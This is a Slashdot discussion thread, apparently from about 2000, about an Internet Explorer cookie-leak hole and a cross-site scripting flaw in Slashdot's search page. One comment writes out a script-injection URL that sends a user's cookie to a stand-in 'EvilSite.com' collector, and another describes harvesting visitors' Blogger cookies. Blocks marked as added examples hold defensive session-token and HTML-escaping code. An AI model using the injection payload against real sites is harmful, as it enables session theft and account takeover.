    Anyone with a packet sniffer can see your cookies. They are not normally encrypted. Web developers should not be putting sensitive information in cookies or using cookies as the only verification needed for secure tasks, like on-line purchases. Sites like Yahoo are very careful to require a password before letting you edit sensitive data, even if you have a cookie.

    With a policy like that, it really doesn't matter if the entire world looks at your cookies.

    1. Re:cookies were NEVER secure by mohrt · · Score: 1

      What does this have to do with cookies? If you are not on an encrypted connection such as SSL, you can pick up *any* traffic with a sniffer, regardless if it is cookies or not. This does not condone cookies as being any less secure than any other data sent through the network.

    2. Re:cookies were NEVER secure by mohrt · · Score: 1

      I believe it is. Although, there are tricks to get around this, like using javascript to first encode the password before sending it across. Not a perfect solution, but it makes those passwords harder to detect with a sniffer.

    3. Re:cookies were NEVER secure by Camel+Pilot · · Score: 1

      Well if you have a packet sniffer on a lan or wan cookies would be one of the least significant data items you can receive (such as clear text passwords, cc numbers or whatever is being transmitted in the domain you have access to). Right? Or am I missing your point.

    4. Re:cookies were NEVER secure by Oarboat_7 · · Score: 1

      So, is the password that Yahoo requests being sent over the wire as plaintext?

      Hmmm.

  59. microsoft innovates - yeah right by lanman5000 · · Score: 1

    I love it when M$ products have problems. It's one of the only ways the public can see how crappy their software is. Just compare the win95/98 crash rate with the linux crash rate. Win sometimes crashes 1-3 times a day, and linux has been known to run crashless for over a year. I can't wait till the day people will find that most of the competing products are ACTUALLY BETTER! Win2k Dataserver has very high specs, like the ability to handle up to 64G ram and 32 cpus. But if you think about it, which is better: a crash-prone closed source NT5 system with high specs and a budget-crushing price tag, or a crash-free open source linux system with lower specs and no price tag? Linux will eventually support even more stuff anyway.

    1. Re:microsoft innovates - yeah right by Falcula · · Score: 1

      The problem is most users don't see the problems whether through desensitization or just not knowing that computers don't need to be rebooted every day or two.

      I read an article once where one guy said that he thought windows products were getting better and better until he realized it was just Pavlovian conditioning to stop hitting ctrl-v and instead select paste from the edit menu because the hotkey combo crashed the program. After awhile you don't even remember there should be an easier way to do things, you just do them in the way they work.

  60. Re:And the paranoids rejoice!! by nEoN+nOoDlE · · Score: 1

    well I hope bgates@microsoft.com is enjoying the spam meant for me. hehe.

    --
    Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
  61. M$ breakup by jhittner · · Score: 1

    Next thing you know Bill Gates will be saying that things like this will be worse if they breakup Microsoft, just like he said about the ILOVEYOU worm.

  62. no. by phossie · · Score: 1

    no. read the article.

    --

    [|]
  63. cookie paranoia by mohrt · · Score: 1

    Great, now this just amplifies the general concern about the security of cookies, even though it is entirely at the fault of the MSIE browser.

  64. alright, I will by Anonymous Coward · · Score: 1
    Linux security is strengthened...
    Microsoft security is to be made fun of...

    Microsoft security is a laughing (or crying) matter in a public forum simply because the discussion will most likely have no effect on the software in question, whereas Linux (or any other OSS) can, and probably will, be patched relatively quickly after the discovery of a similar problem.

    Jamie's commentary is put into perspective by his understanding of the problem at hand and MS's history of related problems (hell, recent history even). On the other hand, if you disregard someone's opinion on the basis of their rhetoric, especially within this community, you may be missing some excellent technical viewpoints.

  65. Re:No big deal.. by aziraphale · · Score: 1
    Hmm. Worse still, I'm guessing that a lot of people use the same password on all the sites they're registered with, because remembering multiple passwords is a pain.

    That would mean that if a site can collect a cookie from someone who stores the password clientside using some lame - and known - encoding, they could try it out on a few more serious sites that just use the old random number trick. There's gotta be at least an even chance of them being able to get in.

  66. Re:Didn't work for me. by TomV · · Score: 1
    I tried it with NT4SP3 IE4 and it worked

    What is this obsession with testing heavily obsolete versions for these exploits? I was under the impression that one of the major benefits of OSS is the rapid availability of, and ease of implementing, patches.

    And yet this principle seems to be rarely applied to other (non-OSS) s/w. In this case we're looking at a version of NT4 (still the main NT, really, W2k notwithstanding) at SP3 when SP6 has been out for months, running IE4 when IE5 is a year old now.

    MS do not charge for patches or SP's. They run a variety of alerting services from www.microsoft.com, and while they don't always patch everything as fast as they should, they do inform you as soon as the patches are out, IF you can be bothered to subscribe to the alerts.

    Double Standards, basically.

    TomV

  67. please don't post fake "fixes" by Marc+Slemko · · Score: 1

    Oh yea. Your page boils down to "let's invent a new very weak encryption scheme". Then you explain why encrypting the username and password don't do much good (ie. if they are what authenticates the user, then any user who gets that info is authenticated as the user) while ignoring the little point that your magic scheme suffers from the same problem!

    It is pretty obvious that you can and should do something other than just sticking the password in a cookie, and most sites do. Then many sites, such as Amazon, still require you to enter your password before doing "important" things.

    Thanks, but no thanks.

  68. Re:UNIX _IS_ s/e/a/ ffected by bjb · · Score: 1
    It runs like poop. Yes, it's better than IE3 or IE4 for solaris (the latter being able to bring the X server to its knees it was so bad), but it still has all the little annoying "features":
    • Bringing a window to front when you don't want it to
    • Causing your X server to groan under the stress of code not written with X in mind
    • No proper java (actually uses appletviewer which is a debatable good/bad)
    • Editing options is PAINFULLY slow even on a fast machine
    Fun.

    --
    --
    Never hit your grandmother with a shovel, for it leaves a bad impression on her mind...
  69. Re:WRONG! by Steeltoe · · Score: 1

    "MS is far from perfect, but failure to automagically patch exploits that don't yet exist is not a valid line of attack against anyone."

    I'm glad those people making UNIX didn't say the same.. Take care!

    - Steeltoe

  70. Ah, but you missed a big point... by hey! · · Score: 2

    What about Intranets? Companies are using these for a lot of things now, including sensitive strategic and HR data.

    Now anytime a boss visits a hostile web site, he may be giving away the keys to the company's proprietary data. Even if personal web sharing is not allowed, a hostile employee and an outside confederate could easily stir up a lot of trouble.

    --
    Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
  71. Re:The website (Slashdot) shoud refuse the GET met by c+era · · Score: 1
    The GET vs POST doesn't matter, you can still send information in a POST method with a click.
    <form name=some_form method=post>
    <input type=hidden name=info value=info>
    </form>
    <a href="javascript:document.some_form.submit()">click here</a>
  72. Slashdot Cookie by jbarnett · · Score: 2


    Test your for your Slash Dot Cookie

    Mine was chocolate chip Mmmmm

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  73. Lost functionality isn't worth it by ionpro · · Score: 1

    HTML adds a lot of functionality to a poster. Perhaps it can be dangerous - that is what moderation is for. However, a lot of things can be looked for; especially javascript event handlers and such. I like being able to add emphasis and properly underline text (unfortunately not allowed by slash), and bold is also useful for some things.

  74. I can edit your blog. by eric.costello · · Score: 1
    To help prove how serious this security hole is, I have set up the following demonstration. You must be using IE, and have checked "remember me" when you logged on to Blogger, or have logged on (and not off) to Blogger in your current browser session.
    1. Go create a new account at http://www.blogger.com (unless you want me to mess with your real account), check "remember me" when you log on.
    2. Create a new blog, enter your FTP password if you want me to be able to actually publish changes I make.
    3. Add a blog entry that says you want me (Eric Costello) to add an entry to prove I was there.
    4. Go to http://www.glish.com/cookies.html.
    I will get your cookie info and will soon have access to your blog. I have confirmed this works by hacking into pixelpony's blog.
    1. Re:I can edit your blog. by Marc+Slemko · · Score: 1

      You don't need a bug in IE to do this. The 404 error page on www.blogger.com is vulnerable (the default 404 page on IIS5 is, or was, vulnerable), so any browser with javascript (or other scripting languages, or even some without) is vulnerable through "cross site scripting" exploits.

      So, as I said before, sure this bug in IE is a pain but it isn't all that significant compared to the known issues out there...

  75. InterMute blocks cookies by PerlDiver · · Score: 1
    Intermute selectively blocks cookies by domain name (e.g., you can tell it to block all cookies, and then specify exceptions for sites that need them).

    It's not open source... but it's cheap. And it does block cookies. When I try the test page, all I get is "Cookie blocked by InterMute".

    I'm not 100% fond of the company... they have discontinued all versions except Windows. But if you're stuck using Windows -- I'm currently contracting for a Big Name PC manufacturer where non-MS OS'es are prohibited by company policy -- the control InterMute gives you is indispensable.

    Hey, while you're at their site, ask them (nicely) to reinstate the UNIX and Mac versions. (The product is written in Java, so supporting these platforms should not be rocket science.)

    --
    Simpletoneity, n. -- The phenomenon of many people all doing the same stupid thing at the same time.
  76. Re:M$ caught in the cookie jar? again?! by Alpha+State · · Score: 1

    Junkbuster changes the user agent info to this because many exploits are browser-specific.

  77. Re:I am gonna... by mr3038 · · Score: 1

    I'm pretty sure you cannot fit entire spec in one cookie. Nice idea though.
    _________________________

    --
    _________________________
    Spelling and grammar mistakes left as an exercise for the reader.
  78. meaning? by Danse · · Score: 2

    So anyone can read the document and create an implementation without Microsoft's permission now? They don't have to illegally copy the document or anything. I'm curious to know how the situation stands right now.

    --
    It's not enough to bash in heads, you've got to bash in minds. - Captain Hammer
  79. Re:M$ caught in the cookie jar? again?! by Marc+Slemko · · Score: 2

    However, be sure to note that the only reason this stops this particular exploit is because the page is coded to check for the browser. If it wasn't, then simply sending a different User-Agent would be no protection at all.

  80. The MS License ALLOWS posting on /. by qnonsense · · Score: 2

    Right. And it has this in the license:
    ...Microsoft grants to you the following...to reproduce and use a reasonable number of copies of the Specification in its entirety for the sole purpose of reviewing the Specification for security analysis...

    Doesn't posting on Slashdot count as this????

    --
    There comes a time in every man's life when he must say, "No mother! I do not want any more Jell-O!"
  81. Re:No big deal.. by G27+Radio · · Score: 2

    That beats mine by a longshot. BTW, do you have any references so we know that you didn't keep our passwords? You da man.

    numb

  82. Especially sucks for Amazon customers... by John_Booty · · Score: 1

    I don't think this issue is "overblown". It's pretty serious! For example, Amazon has that patented "One-Click Checkout" feature, or whatever they call it. Basically, once you activate that feature, you can check out your purchases with one click. No need to enter your credit card or any other info.

    Either the credit card info (and other info) is stored in your cookie, or the cookie simply stores a key that references all that info in Amazon's database.

    The upshot is this: if someone copies your cookie, they'd have unrestricted access to your Amazon account... they could order stuff, change your customer info, etc. Whoa, that would suck!!!

    --

    OtakuBooty.com: Smart, funny, sexy nerds.
  83. Ahem! by Anonymous+Elf · · Score: 1

    If you don't want a paper or electronic trail of your purchases, don't give them your credit card! Use cash in a walk-in store or buy through an intermediary.

    You're asking them to engage in a legal transaction then wipe all information of that transaction from their databases!?

    1. Re:Ahem! by Oarboat_7 · · Score: 1

      I'm asking them to make information (mostly just my credit card info) entirely inaccessible to anybody online in any fashion once I've made my purchase. It can be on machines not connected to the net, it can be on paper where necessary.

      It shouldn't be behind a single password.

  84. No big deal.. by drwiii · · Score: 5

    I can do that with Netscape too.

    1. Re:No big deal.. by jqs · · Score: 1

      So this isn't an MS IE thing is it? Can someone post or direct us to the source for this exploit?

    2. Re:No big deal.. by pudge · · Score: 2

      You could, you know, tell us when you find a hole, so we could, you know, plug it up and stuff.

    3. Re:No big deal.. by smurfi · · Score: 2
      Ouch! I guess I'll have to take a hard look at my cookies file, to see who else stores my password in the cookie.

      Hey, /., there is no need at all to store my password in the cookie. A random number, stored in my user record, will work just as well, and (even better) /. can change it periodically -- thus, any replay attacks stop working after a day or so.

      Please fix that. Now. Thank you.
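
Added example, not part of the thread and not Slashdot's code: one way to implement the scheme this comment asks for, a random per-user token kept in the user record and replaced periodically, so that a copied cookie stops working after rotation or after a day. The `SessionStore` class, the `uid:token` cookie layout and the user id are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_LIFETIME = 24 * 60 * 60  # seconds; "a day or so", per the comment above


class SessionStore:
    """Hypothetical stand-in for the site's user records (not Slashdot code)."""

    def __init__(self, clock=time.time):
        self._records = {}    # uid -> (sha256 of current token, issue time)
        self._clock = clock   # injectable so expiry can be exercised offline

    @staticmethod
    def _digest(token):
        # Store only a hash, so a leaked user table does not yield live cookies.
        return hashlib.sha256(token.encode("utf-8")).digest()

    def issue(self, uid):
        """Call after a password login, or to rotate: replaces any older token."""
        token = secrets.token_urlsafe(32)   # 256 random bits, unrelated to the password
        self._records[uid] = (self._digest(token), self._clock())
        return f"{uid}:{token}"             # the cookie value sent to the browser

    def check(self, cookie):
        """Return the uid a cookie authenticates, or None if it is not accepted."""
        uid, sep, token = cookie.partition(":")
        record = self._records.get(uid)
        if not sep or not token or record is None:
            return None
        stored_digest, issued = record
        if not hmac.compare_digest(stored_digest, self._digest(token)):
            return None                     # unknown, or superseded by a rotation
        if self._clock() - issued > TOKEN_LIFETIME:
            del self._records[uid]          # expired: require the password again
            return None
        return uid


def demo():
    """Constructed scenario: a copied cookie before and after rotation and expiry."""
    now = [0.0]
    store = SessionStore(clock=lambda: now[0])
    original = store.issue("1234")          # constructed user id
    copied = original                       # the value a cookie thief would hold
    results = {"copied_before_rotation": store.check(copied)}
    fresh = store.issue("1234")             # periodic rotation by the site
    results["copied_after_rotation"] = store.check(copied)
    results["fresh_after_rotation"] = store.check(fresh)
    now[0] += TOKEN_LIFETIME + 1            # more than a day passes
    results["fresh_after_expiry"] = store.check(fresh)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The cookie never contains the password or anything derived from it, so a stolen copy cannot be tried against other sites where the user reuses that password.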

    4. Re:No big deal.. by nevets · · Score: 1

      Wow! I'm pretty impressed.

      I had no idea about this little problem. But I still believe that the MS problem is much bigger, since you don't need the user to go to the site to get the cookie. It was pretty obvious that something was going on when I went to your site. But with IE you would have no idea that someone was stealing your cookies, unless you inspect all sites that have java script.

      Still I'm impressed! You nailed both my user number and my password, Let those trolling comments of mine start pouring ;-)

      (I believe you that you don't collect the data)


      Steven Rostedt

      --
      Steven Rostedt
      -- Nevermind
    5. Re:No big deal.. by SurfsUp · · Score: 2

      Yes, I too am impressed and obviously these techniques are pretty common knowledge in certain circles. I'm not saying that wasn't very slick!

      Ah, I'm sure he's trustworthy, but I changed my PW anyway :-)

      I had already, by coincidence, taken the step of linking my cookies file to /dev/null a couple of days ago, and have since been reflecting on the desirability of being able to script my browser so I can set up a quick link to a site that requires cookies, with cookies enabled, then turn them off and delete the cookies as soon as I'm done. I guess I'll use Mozilla for that. Yet another reason why Mozilla is really cool.

      Javascript is now off too. :-) Thanks for the clear demonstration. What a gaping security hole!

      Java is still enabled over here, though. Until somebody demonstrates to me why that's a security risk too...
      --

      --
      Life's a bitch but somebody's gotta do it.
    6. Re:No big deal.. by pod · · Score: 4
      Ahh, this looks to be a slashdot specific exploit. It makes slashdot put your loginid and password in the url, and redirects back to the script thus transmitting the referrer.

      It's actually an exploit discussed on CERT where a malicious web site can embed some script in a link to a cgi script, which in turn pastes it into the resulting page unaltered and the victim's browser executes it.

      In this case the script is a bit of javascript that outputs your slashdot cookie via search.pl. All javascript enabled browsers are affected by this.

      It's just a result of sloppy coding.

      --
      "Hot lesbian witches! It's fucking genius!"
  85. Re:ok, differentiate for me by linatux · · Score: 2

    The difference is that anyone (skilled enough) can fix linux problems. Only Microsoft can fix MS problems - if/when they get around to it.

    Besides, bashing M$ is fun. Bashing the under-dog would be seen as cruel!

  86. confirmed - works on the latest by majcher · · Score: 1

    I just tested the bug/hole on IE5 on Windows 2000, and it does indeed work there.

  87. Re:uh, I think yes by Erv+Walter · · Score: 3

    Actually the article just says that you can't get to credit card info or other account maintenance things because you are asked to type a password. This is correct. However, if the user has set up one-click on the computer you stole the cookies from, you probably can one-click order stuff. There is no password required for one-click (just "one click"). It's all based on cookies. Of course, whatever you order will be shipped to the victim and not to you, but you'll still run up their credit card bill :(

    --
    -- Erv Walter
  88. Re:A potential sploit by unDees · · Score: 2
    So does this mean I can grab somebody's Amazon.com cookie, paste it into my own cookie file, and order stuff from Amazon using "One-click"

    Well, yeah, but all the stuff will go to the poor sap whose cookies you stole. Hey, you could order him lots of pr0nography and stuff--let 'im explain that to his significant other.

    unDees

    --
    "I call a baby goat a 'goatse.'" -- my non-Internet-savvy 6-year-old stepdaughter
  89. Re:A potential sploit by GypC · · Score: 1

    yep... that pretty much sums it up...

    "Free your mind and your ass will follow"

  90. OT MS & Kerberos (Re:This is pathetic.) by acroyear · · Score: 2
    Oh and BTW... the whole Kerberos thing? Microsoft released the specs as a trade secret. TRADE SECRETS HAVE NO PROTECTION UNDER THE LAW ONCE THEY ARE LEAKED. That's why they are guarded so viciously.

    So it's no longer a trade secret. It's still a copyrighted document and is still protected as such.

    --
    "But remember, most lynch mobs aren't this nice." (H.Simpson)
    -- Joe
  91. OT .sigs (i.e. 3:30 on a Friday afternoon) by Wah · · Score: 1

    My .sig is my virtual t-shirt (and I'm a big t-shirt fan). I just try to keep it clean, anything else is fair game.

    And I actually think that some of those sign up a friend deals may actually work..but it's gonna take a lot more surfing from a lot more monkeys before the things pay real money. And where is that advertising money coming from you ask? Hmmm, I'm thinking of older mediums....
    --

    --
    +&x
  92. Not if you use Opera web browser. by FFFish · · Score: 2

    It posts, but anonymously.

    Rule of thumb: if you want security or privacy, do not use a Microsoft product.

    --

    --

    --
    Don't like it? Respond with words, not karma.
  93. Not true, you can't sue anyone by WillAffleck · · Score: 1

    Point of law -
    Anyone CAN sue anyone.


    Not true. In most Commonwealth countries, you can only sue the Crown (aka govt) if it lets you sue. I believe you can't sue the Supreme Court, Congress, the President, and the Senate unless they permit you to. There are certain exceptions to this rule, but in general, you can't sue certain portions of government or royal personages without their permission.

    --
    Will in Seattle
  94. McAfee and UCITA by Bourbon+Man · · Score: 1

    Maybe someone should point out to these people who are pointing fingers at McAfee etc that under UCITA, there's no way they can do anything about it, even *if* McAfee was to blame, and even *if* McAfee knew the potential for this was there. They're just screwed. McAfee can just say, "Tough shit. Read the shrinkwrap license next time." Maybe then these idiot politicians would realize what UCITA is all about, and realize they are voting in legislation that can come back and bite them on the ass.

  95. Re:Warning! This doesn't close the hole by Wah · · Score: 1

    hehe. What happened to your .sig?

    (just a gentle jab :-)
    --

    --
    +&x
  96. Re:Fails on Mac IE 5 by j|m · · Score: 1

    This is because Mac IE 5 is even stupider... It also recognizes that stuff as part of the domain, but actually tries to go to a domain by that name to fetch that page.
    As in, when going to the malicious page (like
    http://www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.something.com/)
    it will try to connect to
    www.peacefire.org%2fsecurity%2fiecookies%2fshowcookie.html%3F.something.com:80
    to fetch the page.

    Geesh. This stuff is stupid!

  97. Re:Didn't work for me. by nevets · · Score: 1

    Late reply, but I just noticed your response.

    Actually, I was just stating that this works with IE 4 to show that it existed in previous versions. It was proven to work with IE 5 on Windows 98, but because of my firewall, and the way IE upgrades, I have yet to be able to get IE 5. So all I have to test with is IE 4.

    I have never been one to say "It didn't work in this 'old' version". But this test was to state that it wasn't caused by any new features. It was there for a while, so if it was discovered before, it could have been exploited since then.

    Steven Rostedt

    --
    Steven Rostedt
    -- Nevermind
  98. TI-89 Also Affected by MathJMendl · · Score: 1

    Ok, I just tried Internet Explorer on my TI-89 and the same thing happened. I logged on to slashdot and had another TI-89 try to find its password by sending it packets and delaying the loading of the website, and it worked. I'm not even sure what to do now, as the unimaginable has happened. Hmm, I didn't even know that IE for the 89 had cookies.

    --


    "I have not failed. I've simply found 10,000 ways that won't work." --Thomas Edison
  99. Re:oh give me a break by IntlHarvester · · Score: 1

    You honestly believe that Linux program that you executed could not get your address book (grep) and send mail (mail)?

    Thanks for the object example -- the Linux version of ILOVEYOU is coming sooner than anyone expects.
    --

    --
    Business. Numbers. Money. People. Computer World.
  100. Re:And the paranoids rejoice!! by aonifer · · Score: 1
    Is it just me or do people find reasons to get all up in arms for nothing. For all of you who will respond that this is a big deal, remember your name/address AND phone number are all available in your local phone book.

    Not if it's unlisted.

  101. You could have really abused this by... by Stephen+VanDahm · · Score: 2

    ...writing the PHP script so that it makes people's browsers post the following:

    ===================

    Subject: Can You Imagine...
    Body:

    ...a Beowulf Cluster of these?

    Thank you.


    ===================

    You would have earned a place in the annals of Slashdot history.

    Take care,

    Steve



    ========
    Stephen C. VanDahm

    1. Re:You could have really abused this by... by G27+Radio · · Score: 3

      You would have earned a place in the annals of Slashdot history.

      That's OK. I now have the most active user-created sid in Slashdot history :)

      numb

    2. Re:You could have really abused this by... by Zan+Thrax · · Score: 1

      Probably. But don't be giving people ideas...

      --

      Intolerant people should be shot.
    3. Re:You could have really abused this by... by Black+Parrot · · Score: 1

      > That's OK. I now have the most active user-created sid in Slashdot history :)

      But can you make it mail itself to everyone in our address book?

      --

      --
      Sheesh, evil *and* a jerk. -- Jade
  102. Re:This is a Hoax! by MathJMendl · · Score: 1

    A hoax, huh? Have you actually tried the link? It found out products from Amazon related to what was in my cart..oops...did I say Amazon? I, uh, would never order from a place like that...

    --


    "I have not failed. I've simply found 10,000 ways that won't work." --Thomas Edison
  103. Re:Doesn't do anything on 2000 by smack_attack · · Score: 1

    Just to confirm:
    Windows 2000 is vulnerable.
    I think it's safe to say that any windows platform is vulnerable... gee, I wonder why? Can anyone say: "windowsupdate.microsoft.com"?

    Now I know why that damn window pops up letting me know it's "checking for updates".

  104. What drwiii is doing is... by Kimble · · Score: 2
    ...exactly what pod says above. However, since I started this before I saw his/her reply, I'll go ahead and post this as well. ;^) Go to the /. search box at the bottom of this page and type:
    [script]alert("Hi mom!")[/script]
    except use angle brackets instead of square brackets.

    Since search.pl echoes what you type in "Searching blahblahblah" without stripping the JavaScript, you'll get an alertbox when you view the page.

    drwiii's page works like that. That page redirects to something like this URL:

    http://slashdot.org/search.pl?query=[script]location.href = "http://EvilSite.com/cgi-bin/getcookies.pl?data=" + document.cookie;[/script]
    (Actually, the "+" and perhaps the ";" would need to be changed to "%2B" and "%3B" in the URL.) EvilSite's CGI script receives /.'s cookie (in easy-to-parse, semicolon-separated name=value pairs) because the script was actually run from a /. page. (I truly don't mean to say that drwiii is evil in any way.)

    Originally, drwiii's script used /.'s 404 page, which was optimized for people who accidentally made links like this. That loophole got closed after the server move.
    --
    New empires...began ebbing and flowing all over the place like Moon Pies on a hot sidewalk.

    --
    ..!!in an intastella burst i am back to save the universe!!
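
The echo problem described in comment 104, shown as a vulnerable handler beside a hardened one. This is an added example, not part of the original post and not Slashdot's code; the function names and the page layout are hypothetical.

```javascript
// Added example; the handler and its names are hypothetical stand-ins for a
// search script that echoes the submitted query back into the page.

// Pull the "query" parameter out of a raw query string (percent-decoding it).
function readQuery(rawQueryString) {
  return new URLSearchParams(rawQueryString).get("query") || "";
}

// Vulnerable form: the decoded query is pasted into the page as-is, so any
// markup it carries is parsed by the browser as part of the site's own page
// and runs with access to the site's cookies.
function renderSearchUnsafe(rawQueryString) {
  const q = readQuery(rawQueryString);
  return '<form><input name="query" value="' + q + '"></form>\n' +
         "<p>Searching " + q + "</p>";
}

// Characters that can start a tag, start an entity, or end a quoted attribute.
const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Hardened form: decode first, then encode for HTML at the point of output.
// The same encoding covers both places the query is echoed: the element body
// and the double-quoted value attribute.
function renderSearchSafe(rawQueryString) {
  const q = escapeHtml(readQuery(rawQueryString));
  return '<form><input name="query" value="' + q + '"></form>\n' +
         "<p>Searching " + q + "</p>";
}

// Constructed sample input: the alert from the comment above, URL-encoded.
const SAMPLE = "query=" + encodeURIComponent('<script>alert("Hi mom!")</script>');
```

Encoding at output time, rather than stripping "bad" strings on input, is what keeps the echoed text inert in both contexts.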
  105. Warning! This doesn't close the hole by Anonymous+Elf · · Score: 1

    I hate to say this - big MSFT supporter I am - but the hack still worked even though I have EVERYTHING disabled. However, / is one of few sites I allow (thru Junkbuster) to get cookies. That is what the hack targets. AFAIK, if you want to avoid the hack you have to avoid the cookie. Manually login or make sure all your cookies are for trivial matters - like website preferences.

    I'm using IE4 on NT4w/SP6 if that helps.

    Lastly, the LAMENESS FILTER SUCKS - I have to type "Warning" instead of WARNING. OOG come save me.

    1. Re:Warning! This doesn't close the hole by Tower · · Score: 1

      What really sucks about the lameness filter is that it still triggers that damned 70 second wait... so I can't just fix a few things and get on with things... I have to wait, and wait and wait...

      oh well, the joys of reality in an abused public forum.

      --
      "It's tough to be bilingual when you get hit in the head."
  106. Re:And the paranoids rejoice!! by stank · · Score: 1

    What about all those nifty passwords that are stored as cookies?

  107. what do I think? by SEAL · · Score: 2

    I think your post is a bunch of mindless ranting and highly overrated. I don't usually jump to Microsoft's defense but there is no way your post deserved a 5.

    First of all, to the cookie issue: turn off Javascript, OR go into the security settings and disable cookies that are stored on your computer. OR wait a brief moment and Microsoft will have a patch out. OR use any number of 3rd party cookie filtering programs that are out there. Personally I think neither Netscape, nor IE provide sufficient cookie control and management capabilities.

    Also, let's keep some perspective and remember that both IE and Netscape have had vulnerabilities uncovered. They both make mistakes, they both fix them. Let's move on.

    As to the ILOVEYOU stuff - to the best of my knowledge, you had to click on the .vbs file to activate it. You don't go around running executables do you? So this virus/trojan is nothing more than a case of uneducated users trusting something they shouldn't.

    I DO think Microsoft should not allow their script language to poke through your address book. Newbie computer users would be less likely to trust this type of trojan if it wasn't a friend of theirs in the From: field.

    The rest of your rant about the trade secrets and UCITA is nothing more than mindless Slashdot karma whoring. *yawn*

    Best regards,

    SEAL

    1. Re:what do I think? by gid · · Score: 1
      sheesh, voice your opinion and you get marked down... whatever no sweat off my sack. and that's my point.... sorry that I forgot my

      's and made my comment kinda unreadable and hid the intelligent stuff at the end of it ;)

      ---

    2. Re:what do I think? by SEAL · · Score: 1

      Actually I don't care about the points as much as the effect they have. I like browsing with Highest scores first. If moderators consistently give points to mindless crap, then what's the use of doing that? With that said, though, my karma comment was merely directed at the off topic stuff that he tossed into his post, not the browser-related comments.

      SEAL

    3. Re:what do I think? by carlos_benj · · Score: 2
      "As to the ILOVEYOU stuff - to the best of my knowledge, you had to click on the .vbs file to activate it. You don't go around running executables do you? So this virus/trojan is nothing more than a case of uneducated users trusting something they shouldn't."

      You have to set an option to keep Outlook from automatically running .vbs files I believe. I don't think, for security's sake, that should even be an option.

      carlos

      --

      As a matter of fact, I am a lawyer. But I play an actor on TV.

  108. Uh. Oh.. But IE wins handsdown over NetScape by cOdEgUru · · Score: 1

    Well..well..another Hole. Bad timing..I guess. Hope Microsoft would have a say in this. And I hope they do something about this soon, and not take a week before they release something. They have already too much s#%t on their hands now. But, if you were to think about it, Netscape had their fair amount of Security holes. IE is no different. I have been using both for the past three years. IE 3.0 was a dud..but from IE4.0 onwards I found it far far better than Netscape in terms of programmability and ease of use. I am sure there would be people here who would differ..but that's what I like about Slashdot. Finally, a discussion group which has people who don't bicker about small things, though I must say, we have an ego as well as the intellect which is double the size of the Bugs in Windows 2000. But then again, that's the first OS I ever had from MS which I never had to shut down for the last six months and never crashed on me.. Now that's gonna raise a debate again..but it's true for me..and that's it. Anyway, IE is still far better than Netscape in terms of usability and programming on the MS platform, no matter how shitty it is. But I am sure Netscape is getting there. Let's all hope so. I hate sigs..so here's our website. For both MS and linux advocates alike. http://www.hackorama.com

  109. My worst nightmares may become reality! by gempabumi · · Score: 2

    I can't help but think - what if someone grabs my cookie file and mails it to my mother? This is the worst thing to happen since the "History" list in the browsers ...

    ahhhhhhhhck.

    The real security blunder here is sites storing sensitive information in cookies. Idiot moves by microsoft should be anticipated, and _no_ sensitive information should be stored in cookies.

    makes you wonder how long microsoft has been collecting cookies from other web sites ;)

    g

  110. Wish I could read the linked article by Mr.+Slippery · · Score: 5

    A bit offtopic...

    While I don't run Windows or IE, I'm a security-conscious geek, and I'd like to warn my friends and co-workers about this exploit. But my employer of the moment, in order to protect us from evil content, has installed CyberPatrol. As you may know, the fine folks at Peacefire have been having a field day by pointing out the foolishness of censorship programs, and the makers of censorware have (at least in the case of CyberPatrol) responded by adding Peacefire to their blocklists.

    So, all you companies with CyberPatrol installed - your censorship has just made it more difficult for your employees to be informed about a serious security hole.

    Think of it as evolution in action.

    --
    Tom Swiss | the infamous tms | my blog
    You cannot wash away blood with blood
    1. Re:Wish I could read the linked article by Tower · · Score: 1

      Instead of filtering on that, just send off a note to the manager - that should get some attention.

      "Bob, it seems you've been visiting freeteensex.com/natalieportman/members a lot these past few days. It's one of my favorite sites too, but damn it man! You don't even have a door on your cube! Think about the harassment suit the girls in the office could bring against us!"

      wait.... that's not it...

      --
      "It's tough to be bilingual when you get hit in the head."
    2. Re:Wish I could read the linked article by bcilfone · · Score: 1
      I would quit my job immediately if my employer installed filtering software. For God's sake, why would an employer want to forbid their employees from educating themselves?

      Some companies just need to get a clue.

  111. WRONG! by EricWright · · Score: 3

    Did you get a copy of the ILOVEYOU email or attachment? Did you look at the source code? I did. I can tell you for a fact that you had to open the attachment through Windows Scripting Host for it to do ANYTHING! It was a Visual Basic script. Those don't do anything by themselves. I have a copy of it on my HD, and all my jpgs and mp3s are just fine...

    Go read the article you posted the link to. All references to ILOVEYOU are *COMPARISONS*.

    They quite clearly state: "Email viruses are now spreading WITHOUT THE USER OPENING ANY ATTACHMENT..... This is by far the fastest growing virus distribution problem and ripe for a hugely destructive event - at least as large as the ILOVEYOU virus." They make no claims about ILOVEYOU spreading in this manner. They simply use the havoc-level of ILOVEYOU as a baseline for destructiveness.

    The virus they are referring to in this case is the Kak virus.

    Eric

    1. Re:WRONG! by SurfsUp · · Score: 2

      I can tell you for a fact that you had to open the attachment through Windows Scripting Host for it to do ANYTHING!

      Good for you. May I politely point out that scripting host is enabled by default - how is a clueless user going to know to turn it off? Second, I did hear that if you have the preview window open the script will execute without any further help from the user. Ugly. Caveat: I don't normally run Windows, so I didn't check this.
      --
      Life's a bitch but somebody's gotta do it.
  112. Didn't work for me. by pythas · · Score: 1

    I'm at work, trying it with IE 5.0, on NT 4, and it wouldn't display any info for cookies that I have. Anyone else run into this?

    1. Re:Didn't work for me. by nevets · · Score: 1

      Make sure you put a URL in that you have a cookie for. Like "slashdot.org".

      I tried it with NT4SP3 IE4 and it worked. I usually do my browsing with Netscape on Linux, or Netscape on NT. But I had IE4 on my NT machine and started it up. I couldn't get it to work when it dawned on me that I don't browse with IE and had no cookies! So I started browsing a little, and went back, and sure enough it showed my cookies!

      Steven Rostedt

      --
      Steven Rostedt
      -- Nevermind
  113. Re:i'm impressed by Oarboat_7 · · Score: 1

    I noticed, too, that it shunts around the JS code if it doesn't detect IE. Why was this necessary? Are they afraid Netscape would fall down and get hurt if it ran the code?

    That kind of "doctoring" of the demo code on the site only raises skepticism.

